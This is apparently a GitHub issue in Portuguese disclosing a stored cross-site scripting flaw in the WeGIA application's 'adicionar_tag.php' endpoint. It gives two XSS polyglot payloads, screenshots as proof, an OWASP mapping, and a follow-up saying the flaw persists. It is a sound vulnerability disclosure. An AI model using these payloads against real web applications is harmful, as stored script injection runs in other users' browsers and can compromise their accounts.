Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Relatório de Vulnerabilidade - Cross-Site Scripting (XSS) Stored no endpoint 'adicionar_tag.php' #833

Closed
lislovelly opened this issue Dec 14, 2024 · 1 comment

Comments

@lislovelly
Copy link

lislovelly commented Dec 14, 2024

Visão geral da vulnerabilidade

Foi identificada uma vulnerabilidade de segurança na aplicação web WeGIA, no endpoint 'adicionar_tag.php', permitindo que um atacante injete scripts maliciosos. Os scripts injetados podem ser armazenados no servidor e são executados automaticamente sempre que a página afetada é acessada por um usuário.

Detalhes técnicos

Endpoint vulnerável (XSS Armazenado):
POST /html/socio/sistema/adicionar_tag.php

Payloads maliciosos:

;alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
JavaScript://%250Aalert?.(1)//'/\'/"/\"//*\/*%26apos;)/<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/${//;{/*/(alert)(1)}//><Base/Href=//X55.is\76-->

Prova de Conceito (PoC)

XSS armazenado no servidor:

wegia xss

5

7

Análise:

XSS Stored: O payload malicioso é armazenado no servidor, e é executado sempre que a página afetada é acessada, comprometendo a segurança de qualquer usuário que visualize o conteúdo malicioso.

Mapeamento OWASP Top 10:

A03:2021 – Injeção: A falta de validação e sanitização adequada das entradas do usuário permite a injeção de scripts maliciosos, possibilitando ataques de XSS armazenado.

@lislovelly lislovelly changed the title Relatório de Vulnerabilidade - Cross-Site Scripting (XSS) Reflected e Stored Relatório de Vulnerabilidade - Cross-Site Scripting (XSS) Reflected/Stored Dec 14, 2024
@GabrielPintoSouza GabrielPintoSouza self-assigned this Dec 16, 2024
GabrielPintoSouza added a commit that referenced this issue Dec 16, 2024
@lislovelly lislovelly changed the title Relatório de Vulnerabilidade - Cross-Site Scripting (XSS) Reflected/Stored Relatório de Vulnerabilidade - Cross-Site Scripting (XSS) Stored Dec 19, 2024
@lislovelly lislovelly changed the title Relatório de Vulnerabilidade - Cross-Site Scripting (XSS) Stored Relatório de Vulnerabilidade - Cross-Site Scripting (XSS) Stored no endpoint 'adicionar_tag.php' Dec 22, 2024
@lislovelly
Copy link
Author

lislovelly commented Dec 31, 2024

A vulnerabilidade persiste:

Payload injetado:

;alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Screenshot_1

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants